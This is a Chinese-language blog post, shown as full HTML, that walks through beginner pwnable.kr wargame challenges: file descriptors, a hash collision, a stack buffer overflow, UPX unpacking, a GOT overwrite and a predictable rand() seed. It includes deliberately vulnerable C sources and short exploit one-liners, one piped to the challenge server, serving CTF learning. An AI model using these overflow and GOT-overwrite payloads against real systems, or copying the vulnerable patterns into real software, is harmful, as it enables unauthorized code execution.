<!doctype html>



  


<html class="theme-next pisces use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>



<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.0" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="pwn," />





  <link rel="alternate" href="/atom.xml" title="wwNan's blog" type="application/atom+xml" />




  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.1.0" />






<meta name="description" content="fd连入后，可以看到三个文件fd  fd.c  flag。查看fd.c源码只要把fd设置为0，即便准输入文件的文件描述符，然后读入的内容和”LETMEWIN\n”相同就可得到flag collision依旧是三个文件，源代码如下:需要输入20byte的passcode，在经过check_password()函数处理后，和hashcode’0x21DD09EC’相等，就可以获得flag。check_">
<meta name="keywords" content="pwn">
<meta property="og:type" content="article">
<meta property="og:title" content="pwnable.kr学习pwn--虽然是从零开始">
<meta property="og:url" content="http://www.wuweinan.top/2017/04/11/pwnable-kr学习pwn-虽然是从零开始/index.html">
<meta property="og:site_name" content="wwNan's blog">
<meta property="og:description" content="fd连入后，可以看到三个文件fd  fd.c  flag。查看fd.c源码只要把fd设置为0，即便准输入文件的文件描述符，然后读入的内容和”LETMEWIN\n”相同就可得到flag collision依旧是三个文件，源代码如下:需要输入20byte的passcode，在经过check_password()函数处理后，和hashcode’0x21DD09EC’相等，就可以获得flag。check_">
<meta property="og:image" content="http://i.imgur.com/1VMtzNG.png">
<meta property="og:image" content="http://i.imgur.com/olGTLwG.png">
<meta property="og:image" content="http://i.imgur.com/JL7H2SQ.png">
<meta property="og:image" content="http://i.imgur.com/h27tD3U.png">
<meta property="og:image" content="http://i.imgur.com/mwQ7mhS.png">
<meta property="og:image" content="http://i.imgur.com/23PkOpa.png">
<meta property="og:image" content="http://i.imgur.com/tPM0XPp.png">
<meta property="og:image" content="http://i.imgur.com/BkDCX1G.png">
<meta property="og:image" content="http://i.imgur.com/0nrZccz.png">
<meta property="og:updated_time" content="2017-04-16T02:25:47.568Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="pwnable.kr学习pwn--虽然是从零开始">
<meta name="twitter:description" content="fd连入后，可以看到三个文件fd  fd.c  flag。查看fd.c源码只要把fd设置为0，即便准输入文件的文件描述符，然后读入的内容和”LETMEWIN\n”相同就可得到flag collision依旧是三个文件，源代码如下:需要输入20byte的passcode，在经过check_password()函数处理后，和hashcode’0x21DD09EC’相等，就可以获得flag。check_">
<meta name="twitter:image" content="http://i.imgur.com/1VMtzNG.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    sidebar: {"position":"left","display":"post","offset":12,"offset_float":0,"b2t":false,"scrollpercent":false},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://www.wuweinan.top/2017/04/11/pwnable-kr学习pwn-虽然是从零开始/"/>





  <title> pwnable.kr学习pwn--虽然是从零开始 | wwNan's blog </title>
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  














  
  
    
  

  <div class="container sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">wwNan's blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">从头到尾都走了错误的航线</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tasg" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-commonweal">
          <a href="/404.html" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-question-circle"></i> <br />
            
            公益404
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocapitalize="off" autocomplete="off" autocorrect="off"
             placeholder="搜索..." spellcheck="false"
             type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal " itemscope itemtype="http://schema.org/Article">
    <link itemprop="mainEntityOfPage" href="http://www.wuweinan.top/2017/04/11/pwnable-kr学习pwn-虽然是从零开始/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Weinan Wu">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="http://i.imgur.com/M192NFy.png">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="wwNan's blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">
            
            
              
                pwnable.kr学习pwn--虽然是从零开始
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2017-04-11T13:56:15+08:00">
                2017-04-11
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    


    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="fd"><a href="#fd" class="headerlink" title="fd"></a>fd</h2><p>连入后，可以看到三个文件fd  fd.c  flag。查看fd.c源码<br><img src="http://i.imgur.com/1VMtzNG.png" alt=""><br>只要把fd设置为0，即便准输入文件的文件描述符，然后读入的内容和”LETMEWIN\n”相同就可得到flag</p>
<h2 id="collision"><a href="#collision" class="headerlink" title="collision"></a>collision</h2><p>依旧是三个文件，源代码如下:<br><img src="http://i.imgur.com/olGTLwG.png" alt=""><br>需要输入20byte的passcode，在经过check_password()函数处理后，和hashcode’0x21DD09EC’相等，就可以获得flag。check_password()把passcode类型转化为int后，分为5组相加等于0x21DD09EC。所以干脆把0x21DD09EC分成5份，最好就是4个0x0101和一个0x1DD905E8。使用perl或者python可以简化输入过程。</p>
<h2 id="bof"><a href="#bof" class="headerlink" title="bof"></a>bof</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div></pre></td><td class="code"><pre><div class="line">#include &lt;stdio.h&gt;</div><div class="line">#include &lt;string.h&gt;</div><div class="line">#include &lt;stdlib.h&gt;</div><div class="line">void func(int key)&#123;</div><div class="line">        char overflowme[32];</div><div class="line">        printf(&quot;overflow me : &quot;);</div><div class="line">        gets(overflowme);       // smash me!</div><div class="line">        if(key == 0xcafebabe)&#123;</div><div class="line">                system(&quot;/bin/sh&quot;);</div><div class="line">        &#125;</div><div class="line">        else&#123;</div><div class="line">                printf(&quot;Nah..\n&quot;);</div><div class="line">        &#125;</div><div class="line">&#125;</div><div class="line">int main(int argc, char* argv[])&#123;</div><div class="line">        func(0xdeadbeef);</div><div class="line">        return 0;</div><div class="line">&#125;</div></pre></td></tr></table></figure>
<p>漏洞在gets(overflowme)，需要通过溢出，将func(0xdeadbeef)的参数覆盖并修改为0xcafebabe。在GDB可以看到overflowme数组离ebp 0x2c字节，再加上ebp,返回地址8个字节，需要52字节。<br><img src="http://i.imgur.com/JL7H2SQ.png" alt=""><br>使用python构造:(python -c ‘print “A”*52 + “\xbe\xba\xfe\xca”‘;cat -)|nc pwnable.kr 9000</p>
<h2 id="flag"><a href="#flag" class="headerlink" title="flag"></a>flag</h2><p>获得一个名为flag的可执行文件，运行后得到一下提示<br>This is reversing task. all you need is binary<br>可是IDA看不到关键的函数，应该是被加壳了，加壳有UPX,VMP等，这里用vim的%!xxd可以看到UPX。<br>upx -d flag -o flag1 去壳<br>GDB查看反汇编，提示# 0x6c2070 <flag>，设断点在*main+32<br><img src="http://i.imgur.com/h27tD3U.png" alt=""><br>edx寄存器的内容就是0x6c2070，这个地址肯定不是flag，再往下走一步<br><img src="http://i.imgur.com/mwQ7mhS.png" alt=""><br>edx变为0x496628,x/2s 0x496628即为flag</flag></p>
<h2 id="passcode"><a href="#passcode" class="headerlink" title="passcode"></a>passcode</h2><p>passcode.c<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div></pre></td><td class="code"><pre><div class="line">#include &lt;stdio.h&gt;</div><div class="line">#include &lt;stdlib.h&gt;</div><div class="line"></div><div class="line">void login()&#123;</div><div class="line">        int passcode1;</div><div class="line">        int passcode2;</div><div class="line"></div><div class="line">        printf(&quot;enter passcode1 : &quot;);</div><div class="line">        scanf(&quot;%d&quot;, passcode1);</div><div class="line">        fflush(stdin);</div><div class="line"></div><div class="line">        // ha! mommy told me that 32bit is vulnerable to bruteforcing :)</div><div class="line">        printf(&quot;enter passcode2 : &quot;);</div><div class="line">        scanf(&quot;%d&quot;, passcode2);</div><div class="line"></div><div class="line">        printf(&quot;checking...\n&quot;);</div><div class="line">        if(passcode1==338150 &amp;&amp; passcode2==13371337)&#123;</div><div class="line">                printf(&quot;Login OK!\n&quot;);</div><div class="line">                system(&quot;/bin/cat flag&quot;);</div><div class="line">        &#125;</div><div class="line">        else&#123;</div><div class="line">                printf(&quot;Login Failed!\n&quot;);</div><div class="line">                exit(0);</div><div class="line">        &#125;</div><div class="line">&#125;</div><div class="line"></div><div class="line">void welcome()&#123;</div><div class="line">        char name[100];</div><div class="line">        printf(&quot;enter you name : &quot;);</div><div class="line">        scanf(&quot;%100s&quot;, name);</div><div class="line">        printf(&quot;Welcome %s!\n&quot;, name);</div><div class="line">&#125;</div><div class="line"></div><div class="line">int main()&#123;</div><div class="line">        printf(&quot;Toddler&apos;s Secure Login System 1.0 beta.\n&quot;);</div><div class="line"></div><div class="line">        welcome();</div><div class="line">        login();</div><div class="line"></div><div class="line">        // something after login...</div><div class="line">        printf(&quot;Now I can safely trust you that you have credential :)\n&quot;);</div><div class="line">        return 0;</div><div class="line">&#125;</div></pre></td></tr></table></figure></p>
<p>因为scanf中都没有加&amp;符，所以正常输入passcode会报错。passcode使用的是动态链接，在动态连接下对于模块间的调用要定位GOT，在进行跳转，会减慢运行速度。因此还会采用PLT的方法实现延迟绑定，例如调用scanf，首先通过PLT项的结构进行跳转，scanf@plt，scanf@plt的第一条指令就是通过GOT间接跳转的指令，跳转到scanf@GOT即scanf在GOT中保存的项，在这之前动态链接器经过一系列工作后将scanf的地址写进了这个项，因此实现了函数的正确调用。ELF将GOT拆分为两个表”.got”和”.got.plt”。前者保存全局变量引用地址，后者保存函数引用地址。</p>
<p><img src="http://i.imgur.com/23PkOpa.png" alt=""><br>通过上图我们可以知道GOT是可写的，因为因为scanf中都没有加&amp;符，传入的是值，可以利用GOT表覆写技术，将system(“bin/cat flag”)的地址写到表中，并执行。除了scanf，还有fflush函数调用需要以上方式，因此可以把fflush在GOT中的地址改为shellcode的地址。</p>
<p>通过IDA找到system(“bin/cat flag”)的地址为0x080485e3,fflush的地址是0x804a004<br><img src="http://i.imgur.com/tPM0XPp.png" alt=""></p>
<p>而且welcome和login用的是同一栈帧，所以name:ebp-0x70，password1:ebp-0x10，password2:ebp-0xc<br><img src="http://i.imgur.com/BkDCX1G.png" alt=""><br><img src="http://i.imgur.com/0nrZccz.png" alt=""></p>
<p>所以构造shellcode,结果不对，因为scanf中用%d读取数据，所以第二个地址要换成十进制数<br>python -c ‘print “A”*96 + “\x04\xa0\x04\x08” + “\xe3\x85\x04\x08”‘ | ./passcode</p>
<h2 id="random"><a href="#random" class="headerlink" title="random"></a>random</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div></pre></td><td class="code"><pre><div class="line">#include &lt;stdio.h&gt;</div><div class="line"></div><div class="line">int main()&#123;</div><div class="line">        unsigned int random;</div><div class="line">        random = rand();        // random value!</div><div class="line"></div><div class="line">        unsigned int key=0;</div><div class="line">        scanf(&quot;%d&quot;, &amp;key);</div><div class="line"></div><div class="line">        if( (key ^ random) == 0xdeadbeef )&#123;</div><div class="line">                printf(&quot;Good!\n&quot;);</div><div class="line">                system(&quot;/bin/cat flag&quot;);</div><div class="line">                return 0;</div><div class="line">        &#125;</div><div class="line"></div><div class="line">        printf(&quot;Wrong, maybe you should try 2^32 cases.\n&quot;);</div><div class="line">        return 0;</div><div class="line">&#125;</div></pre></td></tr></table></figure>
<p>rand()产生的是伪随机数，每次随机的数都一样，修改random.c，跑一次打印出随机数是多少就可解得flag。</p>

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/pwn/" rel="tag"># pwn</a>
          
        </div>
      

      
        
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2017/04/11/python网络编程学习记录/" rel="next" title="python网络编程学习记录">
                <i class="fa fa-chevron-left"></i> python网络编程学习记录
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2017/04/08/python-装饰器/" rel="prev" title="python 函数工具">
                python 函数工具 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="http://i.imgur.com/M192NFy.png"
               alt="Weinan Wu" />
          <p class="site-author-name" itemprop="name">Weinan Wu</p>
           
              <p class="site-description motion-element" itemprop="description">无知小儿</p>
          
        </div>
        <nav class="site-state motion-element">

          
            <div class="site-state-item site-state-posts">
              <a href="/archives">
                <span class="site-state-item-count">5</span>
                <span class="site-state-item-name">日志</span>
              </a>
            </div>
          

          

          
            
            
            <div class="site-state-item site-state-tags">
              
                <span class="site-state-item-count">3</span>
                <span class="site-state-item-name">标签</span>
              
            </div>
          

        </nav>

        
          <div class="feed-link motion-element">
            <a href="/atom.xml" rel="alternate">
              <i class="fa fa-rss"></i>
              RSS
            </a>
          </div>
        

        <div class="links-of-author motion-element">
          
            
              <span class="links-of-author-item">
                <a href="http://weibo.com/u/3537471693/home?wvr=5" target="_blank" title="Weibo">
                  
                    <i class="fa fa-fw fa-weibo"></i>
                  
                  Weibo
                </a>
              </span>
            
          
        </div>

        
        

        
        
          <div class="links-of-blogroll motion-element links-of-blogroll-inline">
            <div class="links-of-blogroll-title">
              <i class="fa  fa-fw fa-globe"></i>
              
            </div>
            <ul class="links-of-blogroll-list">
              
                <li class="links-of-blogroll-item">
                  <a href="http://example.com/" title="Title" target="_blank">Title</a>
                </li>
              
            </ul>
          </div>
        

        


      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#fd"><span class="nav-text">fd</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#collision"><span class="nav-text">collision</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#bof"><span class="nav-text">bof</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#flag"><span class="nav-text">flag</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#passcode"><span class="nav-text">passcode</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#random"><span class="nav-text">random</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  &copy; 
  <span itemprop="copyrightYear">2017</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Weinan Wu</span>
</div>


<div class="powered-by">
  由 <a class="theme-link" href="https://hexo.io">Hexo</a> 强力驱动
</div>

<div class="theme-info">
  主题 -
  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Pisces
  </a>
</div>


        

        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  








  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.0"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.0"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.0"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.0"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.0"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.0"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.0"></script>



  


  




	





  





  





  






  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    // Search DB path;
    var search_path = "";
    if (search_path.length == 0) {
      search_path = "search.xml";
    }
    var path = "/" + search_path;
    // monitor main search box;

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.popup').toggle();
    }
    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';
      $.ajax({
        url: path,
        dataType: "xml",
        async: true,
        success: function( xmlResponse ) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = $( "entry", xmlResponse ).map(function() {
            return {
              title: $( "title", this ).text(),
              content: $("content",this).text(),
              url: $( "url" , this).text()
            };
          }).get();
          var $input = document.getElementById(search_id);
          var $resultContent = document.getElementById(content_id);
          $input.addEventListener('input', function(){
            var matchcounts = 0;
            var str='<ul class=\"search-result-list\">';
            var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
            $resultContent.innerHTML = "";
            if (this.value.trim().length > 1) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var content_index = [];
                var data_title = data.title.trim().toLowerCase();
                var data_content = data.content.trim().replace(/<[^>]+>/g,"").toLowerCase();
                var data_url = decodeURIComponent(data.url);
                var index_title = -1;
                var index_content = -1;
                var first_occur = -1;
                // only match artiles with not empty titles and contents
                if(data_title != '') {
                  keywords.forEach(function(keyword, i) {
                    index_title = data_title.indexOf(keyword);
                    index_content = data_content.indexOf(keyword);
                    if( index_title >= 0 || index_content >= 0 ){
                      isMatch = true;
                      if (i == 0) {
                        first_occur = index_content;
                      }
                    }

                  });
                }
                // show search results
                if (isMatch) {
                  matchcounts += 1;
                  str += "<li><a href='"+ data_url +"' class='search-result-title'>"+ data_title +"</a>";
                  var content = data.content.trim().replace(/<[^>]+>/g,"");
                  if (first_occur >= 0) {
                    // cut out 100 characters
                    var start = first_occur - 20;
                    var end = first_occur + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if(start == 0){
                      end = 50;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    var match_content = content.substring(start, end);
                    // highlight all keywords
                    keywords.forEach(function(keyword){
                      var regS = new RegExp(keyword, "gi");
                      match_content = match_content.replace(regS, "<b class=\"search-keyword\">"+keyword+"</b>");
                    });

                    str += "<p class=\"search-result\">" + match_content +"...</p>"
                  }
                  str += "</li>";
                }
              })};
            str += "</ul>";
            if (matchcounts == 0) { str = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>' }
            if (keywords == "") { str = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>' }
            $resultContent.innerHTML = str;
          });
          proceedsearch();
        }
      });}

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched == false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(function(e){
      $('.popup').hide();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    });
    $('.popup').click(function(e){
      e.stopPropagation();
    });
  </script>





  

  
<script>
(function(){
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';        
    }
    else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
})();
</script>


  

  

  

</body>
</html>
